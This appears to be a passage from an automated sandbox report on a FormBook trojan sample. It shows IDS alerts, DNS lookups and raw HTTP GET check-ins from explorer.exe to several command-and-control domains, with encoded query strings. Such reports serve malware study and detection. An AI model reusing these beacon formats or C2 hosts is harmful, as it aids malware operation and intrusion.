                                    OLEAUT32.dll | SysFreeString, SysAllocStringLen, VariantClear, VariantTimeToSystemTime, VariantCopy, VariantChangeType, SysAllocString, SysAllocStringByteLen, SysStringLen

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    10/28/21-07:40:49.415574 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                    10/28/21-07:40:50.437941 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                    10/28/21-07:41:05.196993 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                    10/28/21-07:41:15.703875 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 198.54.116.195
                                    10/28/21-07:41:15.703875 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 198.54.116.195
                                    10/28/21-07:41:15.703875 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 198.54.116.195

                                    Network Port Distribution

                                    TCP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Oct 28, 2021 07:40:40.780981064 CEST | 49814 | 80 | 192.168.2.3 | 154.216.113.38
                                    Oct 28, 2021 07:40:41.056339025 CEST | 80 | 49814 | 154.216.113.38 | 192.168.2.3
                                    Oct 28, 2021 07:40:41.056490898 CEST | 49814 | 80 | 192.168.2.3 | 154.216.113.38
                                    Oct 28, 2021 07:40:41.056646109 CEST | 49814 | 80 | 192.168.2.3 | 154.216.113.38
                                    Oct 28, 2021 07:40:41.349755049 CEST | 80 | 49814 | 154.216.113.38 | 192.168.2.3
                                    Oct 28, 2021 07:40:41.349797010 CEST | 80 | 49814 | 154.216.113.38 | 192.168.2.3
                                    Oct 28, 2021 07:40:41.349965096 CEST | 49814 | 80 | 192.168.2.3 | 154.216.113.38
                                    Oct 28, 2021 07:40:41.350013971 CEST | 49814 | 80 | 192.168.2.3 | 154.216.113.38
                                    Oct 28, 2021 07:40:41.624960899 CEST | 80 | 49814 | 154.216.113.38 | 192.168.2.3
                                    Oct 28, 2021 07:40:53.448934078 CEST | 49816 | 80 | 192.168.2.3 | 198.187.31.159
                                    Oct 28, 2021 07:40:53.610605955 CEST | 80 | 49816 | 198.187.31.159 | 192.168.2.3
                                    Oct 28, 2021 07:40:53.610744953 CEST | 49816 | 80 | 192.168.2.3 | 198.187.31.159
                                    Oct 28, 2021 07:40:53.611085892 CEST | 49816 | 80 | 192.168.2.3 | 198.187.31.159
                                    Oct 28, 2021 07:40:53.773292065 CEST | 80 | 49816 | 198.187.31.159 | 192.168.2.3
                                    Oct 28, 2021 07:40:53.773339987 CEST | 80 | 49816 | 198.187.31.159 | 192.168.2.3
                                    Oct 28, 2021 07:40:53.773664951 CEST | 49816 | 80 | 192.168.2.3 | 198.187.31.159
                                    Oct 28, 2021 07:40:53.773725033 CEST | 49816 | 80 | 192.168.2.3 | 198.187.31.159
                                    Oct 28, 2021 07:40:53.935348034 CEST | 80 | 49816 | 198.187.31.159 | 192.168.2.3
                                    Oct 28, 2021 07:40:58.836782932 CEST | 49817 | 80 | 192.168.2.3 | 5.157.87.204
                                    Oct 28, 2021 07:40:58.862085104 CEST | 80 | 49817 | 5.157.87.204 | 192.168.2.3
                                    Oct 28, 2021 07:40:58.862193108 CEST | 49817 | 80 | 192.168.2.3 | 5.157.87.204
                                    Oct 28, 2021 07:40:58.862319946 CEST | 49817 | 80 | 192.168.2.3 | 5.157.87.204
                                    Oct 28, 2021 07:40:58.887377024 CEST | 80 | 49817 | 5.157.87.204 | 192.168.2.3
                                    Oct 28, 2021 07:40:58.888703108 CEST | 80 | 49817 | 5.157.87.204 | 192.168.2.3
                                    Oct 28, 2021 07:40:58.888719082 CEST | 80 | 49817 | 5.157.87.204 | 192.168.2.3
                                    Oct 28, 2021 07:40:58.888940096 CEST | 49817 | 80 | 192.168.2.3 | 5.157.87.204
                                    Oct 28, 2021 07:40:58.889030933 CEST | 49817 | 80 | 192.168.2.3 | 5.157.87.204
                                    Oct 28, 2021 07:40:58.914078951 CEST | 80 | 49817 | 5.157.87.204 | 192.168.2.3
                                    Oct 28, 2021 07:41:10.173774958 CEST | 49818 | 80 | 192.168.2.3 | 198.54.117.215
                                    Oct 28, 2021 07:41:10.336358070 CEST | 80 | 49818 | 198.54.117.215 | 192.168.2.3
                                    Oct 28, 2021 07:41:10.336536884 CEST | 49818 | 80 | 192.168.2.3 | 198.54.117.215
                                    Oct 28, 2021 07:41:10.336775064 CEST | 49818 | 80 | 192.168.2.3 | 198.54.117.215
                                    Oct 28, 2021 07:41:10.503941059 CEST | 80 | 49818 | 198.54.117.215 | 192.168.2.3
                                    Oct 28, 2021 07:41:10.503973961 CEST | 80 | 49818 | 198.54.117.215 | 192.168.2.3

                                    UDP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Oct 28, 2021 07:40:40.391122103 CEST | 56527 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:40:40.767874002 CEST | 53 | 56527 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:40:46.361264944 CEST | 52650 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:40:47.373327971 CEST | 52650 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:40:48.404741049 CEST | 52650 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:40:48.409805059 CEST | 53 | 52650 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:40:49.415467024 CEST | 53 | 52650 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:40:50.437834978 CEST | 53 | 52650 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:40:53.424590111 CEST | 63297 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:40:53.447602987 CEST | 53 | 63297 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:40:58.803464890 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:40:58.835072994 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:41:03.898623943 CEST | 53615 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:41:04.906097889 CEST | 53615 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:41:05.139462948 CEST | 53 | 53615 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:41:05.196773052 CEST | 53 | 53615 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:41:10.148940086 CEST | 50728 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:41:10.172621965 CEST | 53 | 50728 | 8.8.8.8 | 192.168.2.3
                                    Oct 28, 2021 07:41:15.516916037 CEST | 53777 | 53 | 192.168.2.3 | 8.8.8.8
                                    Oct 28, 2021 07:41:15.540014029 CEST | 53 | 53777 | 8.8.8.8 | 192.168.2.3

                                    ICMP Packets

                                    Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                    Oct 28, 2021 07:40:49.415574074 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
                                    Oct 28, 2021 07:40:50.437941074 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
                                    Oct 28, 2021 07:41:05.196993113 CEST | 192.168.2.3 | 8.8.8.8 | d031 | (Port unreachable) | Destination Unreachable

                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Oct 28, 2021 07:40:40.391122103 CEST | 192.168.2.3 | 8.8.8.8 | 0x7892 | Standard query (0) | www.jntycy.com | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:46.361264944 CEST | 192.168.2.3 | 8.8.8.8 | 0x769a | Standard query (0) | www.knowsyourdream.com | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:47.373327971 CEST | 192.168.2.3 | 8.8.8.8 | 0x769a | Standard query (0) | www.knowsyourdream.com | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:48.404741049 CEST | 192.168.2.3 | 8.8.8.8 | 0x769a | Standard query (0) | www.knowsyourdream.com | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:53.424590111 CEST | 192.168.2.3 | 8.8.8.8 | 0xd795 | Standard query (0) | www.publiccoins.online | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:58.803464890 CEST | 192.168.2.3 | 8.8.8.8 | 0x6e00 | Standard query (0) | www.thebrandstudiointernational.com | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:03.898623943 CEST | 192.168.2.3 | 8.8.8.8 | 0xad6d | Standard query (0) | www.hcbg.online | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:04.906097889 CEST | 192.168.2.3 | 8.8.8.8 | 0xad6d | Standard query (0) | www.hcbg.online | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.148940086 CEST | 192.168.2.3 | 8.8.8.8 | 0x315c | Standard query (0) | www.theravewizards.com | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:15.516916037 CEST | 192.168.2.3 | 8.8.8.8 | 0x7662 | Standard query (0) | www.mylyk.net | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Oct 28, 2021 07:40:40.767874002 CEST | 8.8.8.8 | 192.168.2.3 | 0x7892 | No error (0) | www.jntycy.com |  | 154.216.113.38 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:48.409805059 CEST | 8.8.8.8 | 192.168.2.3 | 0x769a | Server failure (2) | www.knowsyourdream.com | none | none | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:49.415467024 CEST | 8.8.8.8 | 192.168.2.3 | 0x769a | Server failure (2) | www.knowsyourdream.com | none | none | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:50.437834978 CEST | 8.8.8.8 | 192.168.2.3 | 0x769a | Server failure (2) | www.knowsyourdream.com | none | none | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:53.447602987 CEST | 8.8.8.8 | 192.168.2.3 | 0xd795 | No error (0) | www.publiccoins.online | publiccoins.online |  | CNAME (Canonical name) | IN (0x0001)
                                    Oct 28, 2021 07:40:53.447602987 CEST | 8.8.8.8 | 192.168.2.3 | 0xd795 | No error (0) | publiccoins.online |  | 198.187.31.159 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:40:58.835072994 CEST | 8.8.8.8 | 192.168.2.3 | 0x6e00 | No error (0) | www.thebrandstudiointernational.com | thebrandstudiointernational.com |  | CNAME (Canonical name) | IN (0x0001)
                                    Oct 28, 2021 07:40:58.835072994 CEST | 8.8.8.8 | 192.168.2.3 | 0x6e00 | No error (0) | thebrandstudiointernational.com |  | 5.157.87.204 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:05.139462948 CEST | 8.8.8.8 | 192.168.2.3 | 0xad6d | Name error (3) | www.hcbg.online | none | none | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:05.196773052 CEST | 8.8.8.8 | 192.168.2.3 | 0xad6d | Name error (3) | www.hcbg.online | none | none | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | www.theravewizards.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | parkingpage.namecheap.com |  | 198.54.117.215 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | parkingpage.namecheap.com |  | 198.54.117.218 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | parkingpage.namecheap.com |  | 198.54.117.216 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | parkingpage.namecheap.com |  | 198.54.117.211 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | parkingpage.namecheap.com |  | 198.54.117.210 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | parkingpage.namecheap.com |  | 198.54.117.212 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST | 8.8.8.8 | 192.168.2.3 | 0x315c | No error (0) | parkingpage.namecheap.com |  | 198.54.117.217 | A (IP address) | IN (0x0001)
                                    Oct 28, 2021 07:41:15.540014029 CEST | 8.8.8.8 | 192.168.2.3 | 0x7662 | No error (0) | www.mylyk.net | mylyk.net |  | CNAME (Canonical name) | IN (0x0001)
                                    Oct 28, 2021 07:41:15.540014029 CEST | 8.8.8.8 | 192.168.2.3 | 0x7662 | No error (0) | mylyk.net |  | 198.54.116.195 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.jntycy.com
                                    • www.publiccoins.online
                                    • www.thebrandstudiointernational.com
                                    • www.theravewizards.com

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.3 | 49814 | 154.216.113.38 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 28, 2021 07:40:41.056646109 CEST | 5993 | OUT | GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1
                                    Host: www.jntycy.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 28, 2021 07:40:41.349755049 CEST | 5995 | IN | HTTP/1.1 200 OK
                                    Content-Type: text/html; charset=UTF-8
                                    Server: Microsoft-IIS/8.5
                                    X-Powered-By: PHP/5.6.40
                                    X-Powered-By: ASP.NET
                                    Date: Thu, 28 Oct 2021 05:40:36 GMT
                                    Connection: close
                                    Content-Length: 1260
                                    Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 22 3e 0d 0a 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 35 31 38 36 36 39 66 30 64 33 31 65 34 31 35 30 38 62 65 30 62 61 62 66 35 61 38 66 63 32 38 22 3b 0d 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 
63 72 69 70 74 22 29 5b 30 5d 3b 20 0d 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42
                                    Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><link rel="icon" href="/favicon.ico" type="image/x-icon"/><title>_</title><meta name="keywords" content="_"> <meta name="description"content="_"><meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertB
                                    Oct 28, 2021 07:40:41.349797010 CEST | 5995 | IN | Data Raw: 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 7a 78 79 68 68 64 2f 74 7a 6a
                                    Data Ascii: efore(bp, s);})();</script><script type='text/javascript' src='/zxyhhd/tzjs/tz.js'></script></head></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    1 | 192.168.2.3 | 49816 | 198.187.31.159 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 28, 2021 07:40:53.611085892 CEST | 6005 | OUT | GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1
                                    Host: www.publiccoins.online
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 28, 2021 07:40:53.773292065 CEST | 6007 | IN | HTTP/1.1 301 Moved Permanently
                                    keep-alive: timeout=5, max=100
                                    content-type: text/html
                                    content-length: 707
                                    date: Thu, 28 Oct 2021 05:40:53 GMT
                                    server: LiteSpeed
                                    location: https://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB
                                    x-turbo-charged-by: LiteSpeed
                                    connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 
20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    2 | 192.168.2.3 | 49817 | 5.157.87.204 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 28, 2021 07:40:58.862319946 CEST | 6008 | OUT | GET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1
                                    Host: www.thebrandstudiointernational.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 28, 2021 07:40:58.888703108 CEST | 6008 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.20.1
                                    Date: Thu, 28 Oct 2021 05:40:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Powered-By: PHP/7.1.30
                                    Data Raw: 31 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 65 7a 65 20 64 6f 6d 65 69 6e 6e 61 61 6d 20 69 73 20 67 65 72 65 67 69 73 74 72 65 65 72 64 20 64 6f 6f 72 20 65 65 6e 20 6b 6c 61 6e 74 20 76 61 6e 20 59 6f 75 72 68 6f 73 74 69 6e 67 2e 6e 6c 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 72 68 6f 73 74 69 6e 67 2e 6e 6c 2f 70 61 72 6b 65 65 72 70 61 67 69 6e 61 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 15f<!DOCTYPE html><html><head><title>Deze domeinnaam is geregistreerd door een klant van Yourhosting.nl</title><meta http-equiv="pragma" content="no-cache"></head><body><iframe style="top:0px;left:0px; width:100%; height:100%; position:absolute" frameborder="0" scrolling="auto" src="https://www.yourhosting.nl/parkeerpagina.html"></iframe></body></html>0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    3 | 192.168.2.3 | 49818 | 198.54.117.215 | 80 | C:\Windows\explorer.exe
